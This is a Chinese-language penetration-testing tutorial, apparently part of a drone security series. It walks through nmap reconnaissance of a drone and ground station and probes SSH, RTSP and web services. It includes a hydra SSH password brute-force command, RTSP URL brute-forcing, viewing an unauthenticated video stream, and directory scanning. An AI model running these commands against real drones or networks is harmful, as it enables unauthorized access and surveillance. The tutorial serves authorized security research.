IoT安全|无人机安全攻防(四):信息收集与服务脆弱性探测

admin
admin
admin
0
文章
0
评论
2025-12-22 12:51:37 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 这篇文章介绍了无人机安全攻防中的信息收集与服务脆弱性探测技术。通过使用nmap等工具扫描网络中的存活主机,识别无人机和地面站,并对SSH、RTSP和PPP等服务进行详细探测。文章提供了具体的命令示例和输出结果,展示了如何发现无人机系统的潜在安全漏洞,如未授权访问RTSP视频流等,为后续渗透测试奠定基础。 综合评分: 91 文章分类: IoT安全,渗透测试,网络安全,漏洞分析,实战经验

cover_image

IoT安全 | 无人机安全攻防 (四):信息收集与服务脆弱性探测

原创

Real返璞归真

Real返璞归真

2025年12月15日 16:43 山东

前言

本文仅供合法授权范围内的安全研究使用,请遵循相关法律法规,不得用于未授权的入侵、破坏或干扰行为。

欢迎关注公众号【Real返璞归真】,我们将不定期分享CTF、二进制安全、安卓逆向等领域的前沿知识与技术内容。

image-20251206150705564

信息收集

主机扫描

接入WiFi网络后,使用ifconfig wlan3命令查看本机IP地址:

image-20251205213329437

然后使用nmap扫描当前网络内存活的主机:

sudo nmap -sN 192.168.13.10/24 --exclude 192.168.13.10

image-20251127104846868

发现两个存活的主机:192.168.13.1192.168.13.14

端口扫描

常见端口

分别扫描两个目标IP的常见TCP服务:

sudo nmap -sS 192.168.13.1

image-20251127105205313

发现该主机开启sshrtsp(流媒体传输协议)ppp服务,可以初步判断该IP是无人机

sudo nmap -sS 192.168.13.14

image-20251127105417854

发现没有扫描到该主机开放的服务端口。

特定端口

除了扫描默认端口,我们尝试寻找MAVLink常用UDP端口:

sudo nmap -sU -p 14550,14540,5760,5762,5763,14549,14569,14580 192.168.13.1
sudo nmap -sU -p 14550,14540,5760,5762,5763,14549,14569,14580 192.168.13.14
  • 14550/14540:无人机和地面站进行通信的端口。
  • 5760, 5762, 5763:MAVLink路由器,消息路由和转发
  • 14549, 14569, 14580:某些厂商的地面站监听数据流或双向通信的端口

image-20251127105822319

因此,可以判断另一个IP为地面站

全端口扫描

如果获取到的端口信息不足,也可以尝试全端口扫描(速度慢):

sudo nmap -sS -sU -p- <IP>

服务探测

针对已开放的端口,进行服务版本信息探测。

对于一些低版本服务,可以结合搜索引擎搜索服务名+版本号+CVE,查找网上可用CVE。

后续和渗透流程一致,可以尝试:提权、权限维持、反弹shell、横向移动、清理痕迹等操作。

SSH

对于SSH服务,可以尝试:

nmap -p22 -sV -sC 192.168.13.1

image-20251127110529738

可以发现该SSH服务使用OpenSSH 8.2p1版本,可以搜索相关CVE或尝试使用hydra工具进行弱密码爆破:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.13.1 -t 8

image-20251127112517923

RTSP

对于RTSP流媒体服务,可以尝试:

nmap -p 554 --script rtsp-url-brute, rtsp-methods 192.168.13.1

image-20251127112657812

发现扫描到了rtsp://192.168.13.1/stream1接口。

安装ffmpeg

sudo apt install ffmpeg

使用ffprobe命令分析视频流的信息:

ffprobe rtsp://192.168.13.1/stream1

image-20251127113221810

根据输出信息,可以发现它运行了GStreamer服务,也可以尝试从这个组件的漏洞进行利用。

使用ffplay命令尝试播放视频流:

ffplay rtsp://192.168.13.1/stream1

image-20251127113939482

发现存在未授权漏洞,可以直接播放视频流(如果存在身份校验,可以寻找相关漏洞或尝试hydra爆破)。

PPP

对于PPP服务,我们尝试直接使用HTTP访问:

curl -v 192.168.13.1:3000

image-20251127114718444

进一步使用whatweb工具探测:

whatweb 192.168.13.1:3000

image-20251127114925643

发现该服务应该是机载计算机的后台登录页面,我们直接访问:

image-20251127115230518

可以尝试寻找漏洞、扫描目录或弱密码爆破:

dirb http://192.168.13.1:3000 /usr/share/dirb/wordlists/common.txt

查看原文:《IoT安全 | 无人机安全攻防 (四):信息收集与服务脆弱性探测》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  4